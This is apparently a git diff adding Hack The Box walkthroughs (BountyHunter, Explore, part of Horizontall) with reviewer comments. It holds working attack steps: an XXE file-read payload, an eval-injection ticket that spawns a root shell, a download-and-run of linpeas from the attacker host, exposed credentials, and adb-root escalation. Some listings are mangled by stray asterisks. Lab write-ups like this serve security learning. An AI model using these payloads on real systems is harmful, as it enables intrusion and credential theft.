+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.3
+ [+] Extensions: php
+ [+] Timeout: 10s
+ ===============================================================
+ 2022/11/20 11:10:47 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /.php (Status: 403) [Size: 281]
+ /index.php (Status: 200) [Size: 25169]
+ /resources (Status: 301) [Size: 324] [--> http://bountyhunter.htb/resources/]
+ /assets (Status: 301) [Size: 321] [--> http://bountyhunter.htb/assets/]
+ /portal.php (Status: 200) [Size: 125]
+ /css (Status: 301) [Size: 318] [--> http://bountyhunter.htb/css/]
+ /db.php (Status: 200) [Size: 0]
+ /js (Status: 301) [Size: 317] [--> http://bountyhunter.htb/js/]
+
+
+
+So let's try to print out the db.php file using the php filter base64-encode method to avoid having the php code being executed when we try to read it:
+
+
+ <****?xml version="1.0" encoding="ISO-8859-1"?> <****!DOCTYPE nothing [ <****!ELEMENT nothing ANY > <****!ENTITY nihilism SYSTEM "php://filter/convert.base64-encode/resource=db.php" >]> <****bugreport> <****title> &nihilism;<****/title> <****cwe>cwe <****/cwe> <****cvss>10.0 <****/cvss> <****reward>999999 <****/reward> <****/bugreport>
+
+ [ 10.8.0.3/24 ] [ nowhere ] [~/HTB/BountyHunter]
+ → base64 -w0 dataphp
+ PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PgogIDwhRE9DVFlQRSBub3RoaW5nIFsgIAogIDwhRUxFTUVOVCBub3RoaW5nIEFOWSA+CiAgPCFFTlRJVFkgbmloaWxpc20gU1lTVEVNICJwaHA6Ly9maWx0ZXIvY29udmVydC5iYXNlNjQtZW5jb2RlL3Jlc291cmNlPWRiLnBocCIgPl0+CgkJPGJ1Z3JlcG9ydD4KCQk8dGl0bGU+Jm5paGlsaXNtOzwvdGl0bGU+CgkJPGN3ZT5jd2U8L2N3ZT4KCQk8Y3Zzcz4xMC4wPC9jdnNzPgoJCTxyZXdhcmQ+OTk5OTk5PC9yZXdhcmQ+CgkJPC9idWdyZXBvcnQ+Cg==%
+
+` 
+
+So it managed to read the db.php file and gave out it's contents in b64 format, so let's decode it:
+
+
+ [ 10.8.0.3/24 ] [ nowhere ] [~/HTB/BountyHunter]
+ → echo 'PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo='
+ | base64 -d
+ <****?php
+ // TODO -> Implement login system with the database.
+ $dbserver = "localhost";
+ $dbname = "bounty";
+ $dbusername = "admin";
+ $dbpassword = "**m19RoAU0hP41A1sTsq6K** ";
+ $testuser = "test";
+ ?>
+
+
+
+And now we have credentials ! Coupled with the development username we found earlier, we login:
+
+
+ [ 10.8.0.3/24 ] [ nowhere ] [~/HTB/BountyHunter]
+ → sshpub development@bountyhunter.htb
+ The authenticity of host 'bountyhunter.htb (10.129.95.166)' can't be established.
+ ED25519 key fingerprint is SHA256:p7RCN4B2AtB69d0vE1LTmg0lRRlnsR1fxArJ+KNoNFQ.
+ This key is not known by any other names.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added 'bountyhunter.htb' (ED25519) to the list of known hosts.
+ development@bountyhunter.htb's password:
+ Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ System information as of Sun 20 Nov 2022 11:16:54 AM UTC
+
+ System load: 0.01
+ Usage of /: 23.7% of 6.83GB
+ Memory usage: 13%
+ Swap usage: 0%
+ Processes: 217
+ Users logged in: 0
+ IPv4 address for eth0: 10.129.95.166
+ IPv6 address for eth0: dead:beef::250:56ff:fe96:475
+
+
+ 0 updates can be applied immediately.
+
+
+ The list of available updates is more than a week old.
+ To check for new updates run: sudo apt update
+
+ Last login: Wed Jul 21 12:04:13 2021 from 10.10.14.8
+ development@bountyhunter:~$ id
+ uid=1000(development) gid=1000(development) groups=1000(development)
+ development@bountyhunter:~$ cat user.txt
+ 62XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! We managed to login as the development user.
+
+## **Part 3 : Getting Root Access**
+
+Then, in order to privesc, we use linpeas.sh as we did on the Previse box:
+
+
+ [term1]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/BountyHunter]
+ → locate linpeas.sh
+ /home/nothing/HTB/Cap/linpeas.sh
+ /home/nothing/HTB/Knife/linpeas.sh
+ /home/nothing/HTB/Paper/linpeas.sh
+ /home/nothing/HTB/Previse/linpeas.sh
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/BountyHunter]
+ → cp /home/nothing/HTB/Previse/linpeas.sh .
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/BountyHunter]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ [term2]
+ development@bountyhunter:~$ which wget curl
+ /usr/bin/wget
+ /usr/bin/curl
+ development@bountyhunter:~$ wget http://10.10.16.14:9090/linpeas.sh -O /tmp/peas.sh
+ --2022-11-20 11:19:30-- http://10.10.16.14:9090/linpeas.sh
+ Connecting to 10.10.16.14:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 776167 (758K) [application/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ /tmp/peas.sh 100%[==========================================================================================================================================================>] 757.98K 123KB/s in 9.3s
+
+ 2022-11-20 11:19:41 (81.1 KB/s) - ‘/tmp/peas.sh’ saved [776167/776167]
+
+
+ development@bountyhunter:~$ chmod +x /tmp/peas.sh
+ development@bountyhunter:~$ /tmp/peas.sh
+
+
+` 
+
+Let it run, then scrolling through the output we see the following:
+
+
+
+So apparently the user development can run a python script as the root user, so let's take a look at it:
+
+
+ development@bountyhunter:~$ cat /opt/skytrain_inc/ticketValidator.py
+ #Skytrain Inc Ticket Validation System 0.1
+ #Do not distribute this file.
+
+ def load_file(loc):
+ if loc.endswith(".md"):
+ return open(loc, 'r')
+ else:
+ print("Wrong file type.")
+ exit()
+
+ def evaluate(ticketFile):
+ #Evaluates a ticket to check for ireggularities.
+ code_line = None
+ for i,x in enumerate(ticketFile.readlines()):
+ if i == 0:
+ if not x.startswith("# Skytrain Inc"):
+ return False
+ continue
+ if i == 1:
+ if not x.startswith("## Ticket to "):
+ return False
+ print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
+ continue
+
+ if x.startswith("__Ticket Code:__"):
+ code_line = i+1
+ continue
+
+ if code_line and i == code_line:
+ if not x.startswith("**"):
+ return False
+ ticketCode = x.replace("**", "").split("+")[0]
+ if int(ticketCode) % 7 == 4:
+ validationNumber = eval(x.replace("**", ""))
+ if validationNumber > 100:
+ return True
+ else:
+ return False
+ return False
+
+ def main():
+ fileName = input("Please enter the path to the ticket file.\n")
+ ticket = load_file(fileName)
+ #DEBUG print(ticket)
+ result = evaluate(ticket)
+ if (result):
+ print("Valid ticket.")
+ else:
+ print("Invalid ticket.")
+ ticket.close
+
+ main()
+
+
+This python script validates tickets with the following format:
+
+
+ development@bountyhunter:/opt/skytrain_inc$ ls -lash invalid_tickets/
+ total 24K
+ 4.0K drwxr-xr-x 2 root root 4.0K Jul 22 2021 .
+ 4.0K drwxr-xr-x 3 root root 4.0K Jul 22 2021 ..
+ 4.0K -r--r--r-- 1 root root 102 Jul 22 2021 390681613.md
+ 4.0K -r--r--r-- 1 root root 86 Jul 22 2021 529582686.md
+ 4.0K -r--r--r-- 1 root root 97 Jul 22 2021 600939065.md
+ 4.0K -r--r--r-- 1 root root 101 Jul 22 2021 734485704.md
+ development@bountyhunter:/opt/skytrain_inc$ cat invalid_tickets/734485704.md
+ # Skytrain Inc
+ ## Ticket to Bridgeport
+ __ticket code:__
+ **18+71+8**
+ ##Issued: 2021/06/21
+ #End Ticket
+
+
+
+So the idea is to create a poisoned ticket like so:
+
+
+ development@bountyhunter:~$ cat /tmp/nihi.md
+ # Skytrain Inc
+ ## Ticket to Bridgeport
+ __Ticket Code:__
+ ****32+110+43+ __import__('os').system('id')****
+ ##Issued: 2022/11/22
+ #End Ticket
+
+ development@bountyhunter:~$ sudo python3.8 /opt/skytrain_inc/ticketValidator.py
+ Please enter the path to the ticket file.
+ /tmp/nihi.md
+ Destination: Bridgeport
+ **uid=0(root) gid=0(root) groups=0(root)**
+ Valid ticket.
+
+
+
+And as you can see we managed to get code execution as the root user, so let's use it to spawn a root shell:
+
+
+ development@bountyhunter:~$ vim /tmp/nihi.md
+ development@bountyhunter:~$ cat /tmp/nihi.md
+ # Skytrain Inc
+ ## Ticket to Bridgeport
+ __Ticket Code:__
+ **32+110+43+ __import__('os').system('bash')**
+ ##Issued: 2022/11/22
+ #End Ticket
+ development@bountyhunter:~$ sudo python3.8 /opt/skytrain_inc/ticketValidator.py
+ Please enter the path to the ticket file.
+ /tmp/nihi.md
+ Destination: Bridgeport
+ root@bountyhunter:/home/development# id
+ uid=0(root) gid=0(root) groups=0(root)
+ root@bountyhunter:/home/development# cd
+ root@bountyhunter:~# cat root.txt
+ af1770ee0049711f6b5450004f011db0
+ afXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to privesc to the root user and get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
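Review bot: the base64 printed after `→ base64 -w0 data` does not encode the file shown by the preceding `cat data`: decoding it gives a DOCTYPE named `nihilist`, an entity named `xxe`, and a literal `<title>nihilism</title>` with no entity reference, so that string as shown would not trigger the read of /etc/passwd; re-run the encoding on the file actually listed (the second listing, after `→ base64 -w0 dataphp`, does match its XML, including `<title>&nihilism;</title>`). The root flag is printed unmasked (`af1770ee0049711f6b5450004f011db0`) immediately above the masked `afXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX` line; drop the unmasked line to match the other flags in the series. The walkthrough never explains why the ticket code `32+110+43+ __import__('os').system('id')` is accepted: the validator takes the text before the first `+` (`32`), requires `int(ticketCode) % 7 == 4` (32 % 7 is 4), then `eval`s the whole line and requires the result to exceed 100, so the numeric prefix has to satisfy both checks before the injected call is evaluated; one sentence on that would let readers build their own ticket. Also, the first poisoned ticket listing shows `****32+110+43+...****` while the second shows `**32+110+43+...**`, which looks like markdown bold leaking into a code block; the XML listings are mangled the same way (`<****?xml`, `<****bugreport>`), and the first `cat data` listing is missing its closing tags. Minor: `sshpub development@bountyhunter.htb` is an unexplained alias; use `ssh` or say what it wraps.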
diff --git a/Easy/67.md b/Easy/67.md
new file mode 100644
index 0000000..11846d2
--- /dev/null
+++ b/Easy/67.md
@@ -0,0 +1,337 @@
+# Explore Writeup
+
+
+
+## Introduction :
+
+Explore is an easy Android box released back in June 2021
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → nmap -sCV -p- explore.htb
+ Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 12:49 UTC
+ Nmap scan report for explore.htb (10.129.17.72)
+ Host is up (0.71s latency).
+
+ PORT STATE SERVICE VERSION
+ 2222/tcp open ssh (protocol 2.0)
+ | fingerprint-strings:
+ | NULL:
+ |_ SSH-2.0-SSH Server - Banana Studio
+ | ssh-hostkey:
+ |_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
+ 42135/tcp open http ES File Explorer Name Response httpd
+ |_http-title: Site doesn't have a title (text/html).
+ |_http-server-header: ES Name Response Server
+ 45141/tcp closed unknown
+ 59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
+ |_http-title: Site doesn't have a title (text/plain).
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port2222-TCP:V=7.92%I=7%D=11/20%Time=637A2270%P=x86_64-pc-linux-gnu%r(N
+ SF:ULL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
+ Service Info: Device: phone
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up a http service on port 59777 so let's investigate it using gobuster:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → gobuster dir -u http://explore.htb:59777 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50
+ ===============================================================
+ Gobuster v3.3
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://explore.htb:59777
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.3
+ [+] Timeout: 10s
+ ===============================================================
+ 2022/11/20 12:42:26 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /product (Status: 301) [Size: 71] [--> /product/]
+ /data (Status: 301) [Size: 65] [--> /data/]
+ /d (Status: 301) [Size: 59] [--> /d/]
+ /bin (Status: 301) [Size: 63] [--> /bin/]
+ /storage (Status: 301) [Size: 71] [--> /storage/]
+ /system (Status: 301) [Size: 69] [--> /system/]
+ /lib (Status: 301) [Size: 63] [--> /lib/]
+ /dev (Status: 301) [Size: 63] [--> /dev/]
+ /cache (Status: 301) [Size: 67] [--> /cache/]
+ /etc (Status: 301) [Size: 63] [--> /etc/]
+ /vendor (Status: 301) [Size: 69] [--> /vendor/]
+ /config (Status: 301) [Size: 69] [--> /config/]
+ /oem (Status: 301) [Size: 63] [--> /oem/]
+ /%20 (Status: 403) [Size: 32]
+ /sys (Status: 301) [Size: 63] [--> /sys/]
+ /init (Status: 403) [Size: 31]
+
+
+
+Trying to browse to it doesnt show much either:
+
+
+
+However when we look back at our nmap scan, it also picked up port 42135 "ES File Explorer", so we look at the available exploits for it:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → findsploit es file explorer
+ ___ _ _ _ _ _
+ / __(_)_ __ __| |___ _ __ | | ___ (_) |_
+ / _\ | | '_ \ / _` / __| '_ \| |/ _ \| | __|
+ / / | | | | | (_| \__ \ |_) | | (_) | | |_
+ \/ |_|_| |_|\__,_|___/ .__/|_|\___/|_|\__|
+ |_|
+
+ + -- --=[ findsploit v2.0 by @xer0dayz
+ + -- --=[ https://sn1persecurity.com
+
+ + -- --=[ SEARCHING: es file explorer
+
+ + -- --=[ NMAP SCRIPTS
+
+ egrep: warning: egrep is obsolescent; using grep -E
+ egrep: warning: egrep is obsolescent; using grep -E
+ egrep: warning: egrep is obsolescent; using grep -E
+
+ + -- --=[ METASPLOIT EXPLOIT S
+
+ egrep: warning: egrep is obsolescent; using grep -E
+ egrep: warning: egrep is obsolescent; using grep -E
+ egrep: warning: egrep is obsolescent; using grep -E
+ 378 gather/ie_sandbox_findfiles 2016-08-09 normal No Internet Explorer Iframe Sandbox File Name Disclosure Vulnerability
+ 550 scanner/http/es_file_explorer_open_port 2019-01-16 normal No ES File Explorer Open Port
+
+ + -- --=[ EXPLOITDB EXPLOITS
+
+ ------------------------------------------------------------------------------------------- ---------------------------------
+ Exploit Title | Path
+ ------------------------------------------------------------------------------------------- ---------------------------------
+ **ES File Explorer 4.1.9.7.4 - Arbitrary File Read | android/remote/50070.py**
+ iOS iFileExplorer Free - Directory Traversal | ios/remote/16278.py
+ MetaProducts Offline Explorer 1.x - FileSystem Disclosure | windows/remote/20488.txt
+ Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2) | windows/remote/3808.html
+ Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1) | windows/remote/24495.rb
+ Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2) | windows/remote/24538.rb
+ Microsoft Internet Explorer - textNode Use-After-Free (MS13-037) (Metasploit) | windows/remote/25999.rb
+ Microsoft Internet Explorer / MSN - ICC Profiles Crash (PoC) | windows/dos/1110.txt
+ Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.CAB' File | windows/remote/19603.txt
+ Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame A | windows/remote/19094.txt
+ Microsoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries For Scriptl | windows/remote/19468.txt
+ Microsoft Internet Explorer 5 / Firefox 0.8 / OmniWeb 4.x - URI Protocol Handler Arbitrary | windows/remote/24116.txt
+ Microsoft Internet Explorer 5/6 - 'file://' Request Zone Bypass | windows/remote/22575.txt
+ Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution | windows/remote/22734.html
+ Microsoft Internet Explorer 6 - Local File Access | windows/remote/29619.html
+ Microsoft Internet Explorer 7 - Arbitrary File Rewrite (MS07-027) | windows/remote/3892.html
+ My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities | ios/webapps/28975.txt
+ WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection | php/webapps/35851.txt
+ ------------------------------------------------------------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+ https://www.exploit-db.com/search?q=es+file+explorer
+ https://www.google.ca/search?q=es%20file%20explorer+exploit
+ https://www.google.ca/search?q=es%20file%20explorer+exploit+site:www.securityfocus.com
+ https://www.google.ca/search?q=es%20file%20explorer+site:0day.today
+ https://www.google.ca/search?q=es%20file%20explorer+site:www.security-database.com
+ https://www.google.ca/search?q=es%20file%20explorer+site:packetstormsecurity.com
+ https://exploits.shodan.io/?q=es+file+explorer
+ https://vulners.com/search?query=es+file+explorer
+
+ + -- --=[ Press any key to search online or Ctrl+C to exit...
+
+
+
+
+In here we find a CVE to read arbitrary files on ES File Explorer, so let's try it out:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → cp $(locate 50070.py) .
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → vim 50070.py
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → python 50070.py help explore.htb
+ [-] WRONG COMMAND!
+ Available commands :
+ listFiles : List all Files.
+ listPics : List all Pictures.
+ listVideos : List all videos.
+ listAudios : List all audios.
+ listApps : List Applications installed.
+ listAppsSystem : List System apps.
+ listAppsPhone : List Communication related apps.
+ listAppsSdcard : List apps on the SDCard.
+ listAppsAll : List all Application.
+ getFile : Download a file.
+ getDeviceInfo : Get device info.
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → python 50070.py listPics explore.htb
+
+ ==================================================================
+ | ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
+ | Coded By : Nehal a.k.a PwnerSec |
+ ==================================================================
+
+ name : concept.jpg
+ time : 4/21/21 02:38:08 AM
+ location : /storage/emulated/0/DCIM/concept.jpg
+ size : 135.33 KB (138,573 Bytes)
+
+ name : anc.png
+ time : 4/21/21 02:37:50 AM
+ location : /storage/emulated/0/DCIM/anc.png
+ size : 6.24 KB (6,392 Bytes)
+
+ name : creds.jpg
+ time : 4/21/21 02:38:18 AM
+ location : /storage/emulated/0/DCIM/creds.jpg
+ size : 1.14 MB (1,200,401 Bytes)
+
+ name : 224_anc.png
+ time : 4/21/21 02:37:21 AM
+ location : /storage/emulated/0/DCIM/224_anc.png
+ size : 124.88 KB (127,876 Bytes)
+
+
+
+Here the creds.jpg file looks interesting so let's download it:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → wget http://explore.htb:59777/storage/emulated/0/DCIM/creds.jpg
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → file creds.jpg
+ creds.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [\012- TIFF image data, big-endian, direntries=12, manufacturer=Apple, model=iPhone XR, orientation=upper-right, xresolution=174, yresolution=182, resolutionunit=2, software=14.4, datetime=2021:03:06 02:13:37, hostcomputer=iPhone XR, GPS-Data], comment: "Optimized by JPEGmini 3.18.2.210033067-TBTBLN 0x905c306b", baseline, precision 8, 4032x3024, components 3
+
+
+
+On it we find credentials:
+
+
+
+So from here we can login as the kristi user with her password "Kr1sT!5h@Rp3xPl0r3!":
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -p 2222 kristi@explore.htb
+ Unable to negotiate with 10.129.17.72 port 2222: no matching host key type found. Their offer: ssh-rsa
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → vim ~/.ssh/config
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → cat ~/.ssh/config| head -n6
+ Host explore
+ HostName explore.htb
+ User kristi
+ PubkeyAcceptedAlgorithms +ssh-rsa
+ HostkeyAlgorithms +ssh-rsa
+ Port 2222
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → sshpub explore
+ The authenticity of host '[explore.htb]:2222 ([10.129.17.72]:2222)' can't be established.
+ RSA key fingerprint is SHA256:3mNL574rJyHCOGm1e7Upx4NHXMg/YnJJzq+jXhdQQxI.
+ This key is not known by any other names.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '[explore.htb]:2222' (RSA) to the list of known hosts.
+ Password authentication
+ (kristi@explore.htb) Password:
+ :/ $ id
+ uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768
+
+
+
+Once logged in, we find the user flag in the /sdcard directory:
+
+
+ :/ $ ls
+ acct init.superuser.rc sbin
+ bin init.usb.configfs.rc sdcard
+ bugreports init.usb.rc sepolicy
+ cache init.zygote32.rc storage
+ charger init.zygote64_32.rc sys
+ config lib system
+ d mnt ueventd.android_x86_64.rc
+ data odm ueventd.rc
+ default.prop oem vendor
+ dev plat_file_contexts vendor_file_contexts
+ etc plat_hwservice_contexts vendor_hwservice_contexts
+ fstab.android_x86_64 plat_property_contexts vendor_property_contexts
+ init plat_seapp_contexts vendor_seapp_contexts
+ init.android_x86_64.rc plat_service_contexts vendor_service_contexts
+ init.environ.rc proc vndservice_contexts
+ init.rc product
+ :/ $ cd sdcard/
+ :/sdcard $ ls
+ Alarms DCIM Movies Notifications Podcasts backups user.txt
+ Android Download Music Pictures Ringtones dianxinos
+ :/sdcard $ cat user.txt
+ f3XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And we got the user flag!
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc we look back at our nmap scan which picked up port 5555, and usually this port is used for the Android Debug Bridge, so let's try to connect to it:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → adb connect explore.htb:5555
+ * daemon not running; starting now at tcp:5037
+ * daemon started successfully
+ ^C
+
+
+
+Doesnt work, because usually adb is used when you want to debug an android phone locally, so let's port forward port 5555:
+
+
+ [term1]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → sshpub -p 2222 -L 5555:localhost:5555 explore
+ Password authentication
+ (kristi@explore.htb) Password:
+ :/ $
+
+ [term2]
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → adb connect 127.0.0.1:5555
+ connected to 127.0.0.1:5555
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → adb root
+ restarting adbd as root
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
+ → adb shell
+ x86_64:/ # id
+ uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:su:s0
+ x86_64:/ # cat /data/root.txt
+ f0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
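Review bot: the sentence "Doesnt work, because usually adb is used when you want to debug an android phone locally" gives the wrong reason. The direct `adb connect explore.htb:5555` hangs until ^C while the same connect through `-L 5555:localhost:5555` succeeds, so the difference is where the connection originates: 5555 answers on the box's own loopback but not from the attacker's network, and the SSH tunnel (as kristi) makes the connection come from localhost. Suggest rewording to that and fixing "Doesnt". The `adb root` step also deserves a sentence: "restarting adbd as root" and the resulting `uid=0(root) ... context=u:r:su:s0` only happen on debuggable builds (userdebug/eng images with ro.debuggable=1), which is the real privesc finding here; a production device refuses `adb root`. Two smaller points: `sshpub` (`sshpub explore`, `sshpub -p 2222 -L 5555:localhost:5555 explore`) is never defined, so the reader cannot reproduce the step, and `-p 2222` is redundant once `Port 2222` is in the `Host explore` stanza; of the two config lines, only `HostkeyAlgorithms +ssh-rsa` addresses the "no matching host key type found. Their offer: ssh-rsa" error, `PubkeyAcceptedAlgorithms +ssh-rsa` does nothing for a password login. Finally, `sshpass -p 'Kr1sT!5h@Rp3xPl0r3!'` leaves the password in shell history and visible in `ps` to every user on the attacking host; `sshpass -e` or `-f` is the safer form and is worth a one-line caveat.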
diff --git a/Easy/68.md b/Easy/68.md
new file mode 100644
index 0000000..0ac4890
--- /dev/null
+++ b/Easy/68.md
@@ -0,0 +1,432 @@
+# Horizontall Writeup
+
+
+
+## Introduction :
+
+Horizontall is an easy Linux box released back in August 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → sudo vim /etc/hosts
+ [sudo] password for nothing:
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → nmap -sCV -p- horizontall.htb
+ Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 15:08 UTC
+ Nmap scan report for horizontall.htb (10.129.17.82)
+ Host is up (0.13s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
+ | 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
+ |_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
+ 80/tcp open http nginx 1.14.0 (Ubuntu)
+ |_http-title: horizontall
+ |_http-server-header: nginx/1.14.0 (Ubuntu)
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 15.62 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+Trying to run gobuster on this site yields no results, so instead we look for other clues by intercepting the traffic with burpsuite:
+
+
+
+And here we found out that there was another domain we could use: **api-prod.horizontall.htb** so let's add it to our hosts file:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → sudo vim /etc/hosts
+ [sudo] password for nothing:
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → cat /etc/hosts | grep horizontall
+ 10.129.17.82 horizontall.htb api-prod.horizontall.htb
+
+
+
+So let's browse to the api endpoint at **http://api-prod.horizontall.htb/reviews** :
+
+
+
+Then let's enumerate it with gobuster:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://api-prod.horizontall.htb
+ ===============================================================
+ Gobuster v3.3
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://api-prod.horizontall.htb
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.3
+ [+] Timeout: 10s
+ ===============================================================
+ 2022/11/20 15:47:07 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /reviews (Status: 200) [Size: 507]
+ /users (Status: 403) [Size: 60]
+ **/admin (Status: 200) [Size: 854]**
+ /Reviews (Status: 200) [Size: 507]
+ /Users (Status: 403) [Size: 60]
+
+
+
+/admin looks interesting, so let's investigate it:
+
+
+
+Here we have a strapi admin login webpage, so let's take a look at the available exploits for it:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Horizontall]
+ → searchsploit strapi
+ ----------------------------------------------------------------------------------------- ---------------------------------
+ Exploit Title | Path
+ ----------------------------------------------------------------------------------------- ---------------------------------
+ Strapi 3.0.0-beta - Set Password (Unauthenticated) | multiple/webapps/50237.py
